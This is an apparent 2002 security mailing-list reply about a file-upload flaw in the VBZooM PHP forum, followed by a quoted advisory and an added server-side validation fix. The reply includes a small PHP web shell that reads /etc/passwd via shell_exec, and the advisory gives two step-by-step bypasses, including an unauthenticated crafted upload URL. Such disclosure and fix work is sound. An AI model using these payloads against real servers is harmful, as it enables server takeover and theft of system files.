The damage could be a lot more than assessed by hish in his last email, and not just infecting the visitors of the forum, but a critical server risk.

For instance, if an attacker makes a perl/php script of malicious code, he could take over the server with the httpd user id. An attacker could create a file with code similar to that below, and upload it with the extension .php ...

<?php
$cmd = "cat /etc/passwd";
// or $cmd = "cat ".dirname($_SERVER['PATH_TRANSLATED'])."/path.to.database.headers";
// or $cmd ="echo \"This is an example \">".dirname($_SERVER['PATH_TRANSLATED'])."/hacked";
$h = shell_exec($cmd);
echo $h;
?>

...and then he will call the URL from his browser to execute the script...

http://host/forums/<attacker-file.php>

The said $cmd will execute.

Regards,
--
M. Zeeshan Mustafa
Software Security Specialist & Architect
E: security@zeeshan.net
C: +92(0)300-9249567
W: http://www.zeeshan.net

On Wednesday 09 October 2002 09:21 pm, hish _ hish wrote:
::::: Name: VBZooM
::::: Version Affected: tested on v1.01, maybe other versions vulnerable also
::::: Severity: Critical
::::: Category: upload system
::::: Vendor URL: http://www.vbzoom.com
::::: Author: hish_hish <hish_hish565@hotmail.com>
::::: Date: disclosed on 28th Aug 2002
::::: published at 8th Oct 2002
:::::
::::: Description
::::: ***********
::::: VBZooM is a bulletin board system which is written in PHP,
::::: the problem lies in the file upload system, the script uses JavaScript to check
::::: for valid extensions.
::::: and you can bypass this check in two ways (see Details).
:::::
:::::
::::: Details
::::: *******
::::: there are two ways to bypass the JavaScript file extension check,
:::::
::::: 1st :
::::: you should be a member in the victim script,
::::: and go to make new subject, now save the page in your hard drive
::::: and remove the JavaScript code // at the last of the page
::::: and make some changes in <form action="add-subject.php ......>
::::: to <form action="http://victim/VBZoom/add-subject.php ....>
::::: now select your malicious file to upload it (should be .php)
::::: OK now hit submit button, the forum will redirect you to your subject
::::: douh :) your file is waiting for you as an attachment :)
::::: NOTE : all visitors can see and use your uploaded file, so forget the 1st
::::: way and see 2nd: .
:::::
::::: 2nd:
:::::
::::: you don't need to be a member in victim forum, just follow me :) .
::::: http://www.victim.com/VBZooM/add-subject.php?Success=1
::::: &FileName=SourceFile&FileName_size=500&FileName_name=DistFile
::::: it will upload your file in "/download" directory.
::::: now execute your .php file
::::: http://www.victim.com/VBZooM/download/DistFile :))
:::::
:::::
::::: Fix Information
::::: ***************
::::: contact http://www.vbzoom.com
:::::
:::::
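
The server-side check that both bypasses above show to be missing, as an added example that is not part of either message and is not VBZooM's code. It assumes the second bypass works because add-subject.php takes the FileName* values from the request; the function names, allowlist, size limit, form field name and storage path are hypothetical.

```php
<?php
// Added example, not VBZooM code. All names and paths below are hypothetical.
const ALLOWED_EXT = ['txt', 'zip', 'gif', 'jpg', 'png'];
const MAX_BYTES   = 512000;

function safe_extension(string $clientName): ?string
{
    // Allowlist the final extension on the server; the JavaScript check
    // in the page can be removed by the client and enforces nothing.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $ext : null;
}

function store_attachment(array $file, string $storeDir): string
{
    // Upload metadata comes only from $_FILES, never from GET/POST values
    // such as FileName, FileName_name or FileName_size.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Refuse any source path that PHP did not receive as an HTTP upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Measure the file itself instead of trusting a client-declared size.
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    $ext = safe_extension($file['name']);
    if ($ext === null) {
        throw new RuntimeException('extension not allowed');
    }
    // Server-chosen name: the client-supplied name never reaches the disk.
    $target = $storeDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return $target;
}

// Request handler: store outside the web root so nothing uploaded can be
// requested, and therefore executed, by URL.
if (isset($_FILES['attachment'])) {
    try {
        store_attachment($_FILES['attachment'], '/var/forum-data/attachments');
    } catch (RuntimeException $e) {
        http_response_code(400);
    }
}
```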